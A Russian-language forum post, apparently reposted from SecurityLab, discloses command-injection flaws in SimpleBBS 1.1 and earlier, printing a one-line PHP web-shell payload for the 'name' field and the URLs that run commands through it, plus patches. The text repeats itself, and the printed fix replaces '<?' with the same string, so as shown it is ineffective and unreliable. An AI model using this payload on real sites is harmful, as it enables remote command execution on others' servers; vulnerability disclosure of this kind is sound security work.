PHP-Including в SimpleBBS <=1.1
Суть уязвимости
Разработчики оставили критическую дыру в форуме SimpleBBS. Суть заключается в том, что сценарий создания нового топика не фильтрует параметр name на наличие "плохих" символов. Т.к. форум все хранит в файлах, а именно: имя юзера, создавшего топик, хранится в файле data/topics.php
Подставив параметр name в виде
можно поиметь сервачок =). (думаю, ясно, что вызывать сценарий нужно так: data/topics.php?cmd=CMD).
Защита от злобных хацкеров:
замена строки 54 в файле includes/newtopic.php с
на
Это защитит форум от тех, кого хлебом не корми, дай поиметь форум =)
Источник: SecurityLab
:zns2: Производитель
Произвел осмотр форума и создал метод защиты: Great
Добавлено в [time]1134479279[/time]
PHP-Including в SimpleBBS <=1.1
Ломалкин-ковырялкин в лице меня решил поискать еще багов в этом замечательном форуме. И представьте, нашел =)
На этот раз в постинге сообщений в тему. Все тот же параметр name. PHP-код инклуда подойдет из первой уязвимости. Только вызывать теперь надо так:
data/posts.php?cmd=CMD
Защита:
Изменить строку 54 в файле includes/addreply.php с
на
И хакеры идут лесом.
Суть уязвимости
Разработчики оставили критическую дыру в форуме SimpleBBS. Суть заключается в том, что сценарий создания нового топика не фильтрует параметр name на наличие "плохих" символов. Т.к. форум все хранит в файлах, а именно: имя юзера, создавшего топик, хранится в файле data/topics.php
Подставив параметр name в виде
Код:
Willy<!--"><?php error_reporting(0);print `$_GET[cmd]`; die;?>
Защита от злобных хацкеров:
замена строки 54 в файле includes/newtopic.php с
Код:
$loginname=$name;
Код:
$loginname=str_replace("<?", "<?", $name);
Источник: SecurityLab
:zns2: Производитель
Произвел осмотр форума и создал метод защиты: Great
Добавлено в [time]1134479279[/time]
PHP-Including в SimpleBBS <=1.1
Ломалкин-ковырялкин в лице меня решил поискать еще багов в этом замечательном форуме. И представьте, нашел =)
На этот раз в постинге сообщений в тему. Все тот же параметр name. PHP-код инклуда подойдет из первой уязвимости. Только вызывать теперь надо так:
data/posts.php?cmd=CMD
Защита:
Изменить строку 54 в файле includes/addreply.php с
Код:
$name = $_POST["name"];
Код:
$name = str_replace("<?", "<?", $_POST["name"]);